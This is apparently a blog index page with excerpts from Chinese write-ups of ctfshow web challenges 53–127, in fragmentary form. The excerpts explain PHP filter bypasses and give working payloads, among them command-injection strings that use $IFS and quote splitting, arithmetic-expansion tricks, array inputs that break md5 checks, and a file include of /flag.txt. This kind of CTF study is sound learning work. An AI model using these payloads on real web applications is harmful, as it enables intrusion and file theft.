web126与web125差不多 12get: a=1+fl0g=flag_give_mepost: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1]) web127绕过方式和we...
ctfshow web入门110~125
web110
考察FilesystemIterator。getcwd()函数 获取当前工作目录 返回当前工作目录。
payload:
1
?v1=FilesystemIterator&v2=getcwd
缺陷是如果flag的文件不在第一位的话,就不能得到这个文件名。
ctfshow web入门105~109
1
2
3
4
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
这一段说get传的值不能等于error。
1
2
3
4
foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
这一段说POST传的值不能等于flag。
1
2
3
if(!($_POST['flag']==$flag)){
die($error);
}
这一段说POST传的值不等于flag的话输出变量error。
payload:
1
2
GET:?a=flag
POST:error=a
ctfshow web入门101~104
web101 12当新建ReflectionClass类并传入PHP代码时,会返回代码的运行结果,可以通过echo显示即使传入了空的括号,代码依旧可以运行,且error_reporting(0)的存在阻止了报错 v1必须是数字,v2可...
ctfshow web97~100
web97
要求POST传参,a不能等于b,但是a和b的md5值要相同,但是md5这个函数呢有个漏洞,传入的参数为数组的时候会发生错误,并返回NULL。
1
a[]=123&b[]=1234
ctfshow web89~96
web89
用数组绕过就行。
payload:
1
?num[]=a;
ctfshow web入门87~88
web87
谈一谈php://filter的妙用
ctfshow web入门69~74
web69和web68一样。
payload:
1
c=include("/flag.txt");
ctfshow web入门57~68
web57
题目显示flag在36.php中,而且给出cat和php了,只要想办法构造出36就可以了。
$(())是做运算,$((${_}))=0,所以只要拼接除-36之后取反就行
payload:
1
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
ctfshow web入门53~56
web53
多过滤了一个wget,多添加了一个回显。
payload:
1
?c=ca''t${IFS}fla''g.php
